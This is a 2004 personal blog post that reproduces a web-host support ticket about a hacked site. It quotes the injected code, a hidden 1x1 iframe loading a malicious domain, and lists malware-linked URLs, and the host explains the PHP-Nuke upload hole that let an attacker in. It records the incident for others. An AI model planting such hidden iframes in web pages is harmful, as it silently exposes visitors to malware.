I would like to make some apologies.
Firstly to all the people I may have appeared to have been ignoring when they spoke to me today and to those who were subjected to rantings about incompetent people.
Secondly to lauperr who is one of the above people but deserves a special apology because I forgot to ask her how her mock driving test went, among other things…
And lastly to James Innes, a name I have come to know a little too well over the past two years, for the transcript posted below. I do feel a little bit of guilt for doing so, but some credit does go to him, and Bargain Host for admitting responsibility in the end, which is something many others would not have done.
Posted on 24 Mar 2004 08:56 PM
I've just loaded my web site (www.tolagrafix.co.uk) in my web browser (Mozilla Firefox) and as it loads I see data being retrieved from a whole collection of pornographic web sites in the taskbar!
When loaded in Internet Explorer the site reacts the same but opens a Search toolbar on the left hand side and fails to load a file.
A friend reported getting warnings pop up from their anti-virus checker when loading pages on my web site, the warnings warned of trojan infections. I checked and I had also been infected with one. According to trendmicro:
malware.BKDR_IRCFLOOD.X
I've checked my web space for files that shouldn't be there and done a virus scan on the files and haven't found anything. Is the virus acting from elsewhere on your server?
Internet Explorer denied access to cookies from the following web pages:
http://www.forced-action.com/menu.html
http://imgdb.bannedstuff.com/jump/teen.php
http://extreme-virgins.com/dl/fox.php
http://porn-party.com/porn/teenthumbs.wqrk/index.html
This is very urgent, I'm supposed to be showing my web site at a job interview in a few days time, it would be very embarrassing.
Thank you very much for your time, please let me know ASAP if you find out what's wrong.
Regards
Ben Francis
====================================
Posted on 24 Mar 2004 09:19 PM
Hello,
There is no virus effected in the webserver. The server is running on unix
platform, the virus will not propagate in unix. Also we have taken all preventive measures
against virus and we have tighten the security.
It can be created while uploading or downloading some virus effected files in your pc.
So please install antivirus software on your system, to prevent this problem.
If you encounter any problems, don't hesitate to reopen the ticket.
Please be assure that we are here to solve all your problems.
Regards,
Support
====================================
Posted on 25 Mar 2004 06:36 PM
Ticket Opened by Customer
Reason Specified: unhelpful reply, information for Bargain Host
====================================
Posted on 25 Mar 2004 06:42 PM
I have had time today to investigate the problem further. It appears the lines:
were added to all of the index pages througout my site. Now, I did *not* add these lines and I'm writing mainly to inform you of this breach of security in case other similar cases appear and it turns out to be a cracker who has breached your servers, again.
Could I also make a polite suggestion that you actually read customer's requests before replying to them. Suggesting I install a virus scanner when I had clearly stated that I had virus scanned all of my files was pointless.
"Also we have taken all preventive measures
against virus and we have tighten the security" is not helpful to me. Unix *can* get virii and anyone who believed their system was completely water tight would be naive. I used a GNU/Linux system to author and upload my pages.
I do not intend the above to sound rude, simply to aid you in improving your customer support.
Thank you for your time
Ben Francis
====================================
Posted on 25 Mar 2004 06:44 PM
Those lines of HTML did not appear correctly in that message, I'll replace the pointy brackets with square ones and see if that helps:
[IFRAME SRC="http://www.forced-action.com/" WIDTH=1 HEIGHT=1][/IFRAME]
[IFRAME SRC="http://www.forced-action.com/" WIDTH=1 HEIGHT=1][/IFRAME]
====================================
Posted on 25 Mar 2004 08:22 PM
Hello,
We apologize for the confusion caused. We will avoid these types of mistakes in the future.
Also do get back to us if your issue is not solved. We will be glad to help you.
If you have further doubts, please dont hesitate to reopen this ticket.
Have a nice day!!!
Regards,
TechSupport
====================================
Posted on 25 Mar 2004 08:25 PM
Hello Ben,
On the 29th Jan 2004 someone uploaded a mailicious script to the server /tmp directory, when code was executed this entered 2 lines of code in our customers homepage (we have not provided link because this will attempt to install a virus on your computer). We quickly located the script and removed it from the server and quarantined every index.* page that was effected by running a script to restore index.* pages. Unfortunately were unable to restore index.php files using the script.
The hacker managed to upload the file through one of our customers PHPnuke powered websites because an insecure module locate at /MY_egallery has a vulnerability that allows hackers to upload malicious code.
We do not allow PHPnuke powered sites on our servers anymore due to this insecure module, as an extra security measure we have also protected /tmp folder so that code cannot be executed by anyone else but root.
If you suspect there is still problems with your homepage please contact admin@bargainhost.co.uk and we will remove the offending code.
Best regards,
IT Manager: James Innes
http://bargainhost.co.uk
Anyway… I now have printed off addresses, maps and train times for tomorrow. Before 2:30pm tomorrow I have to sleep, go to two maths lessons and a computing lesson, find a crate of vintage port, steal a hard disk >= 40Gb and find a way of getting to the train station. Then when I get to Norwich the real fun starts…
Also have a geeky test to fill out for a job application, very important indeed.
Two pieces of coursework due in a weeks time? pah.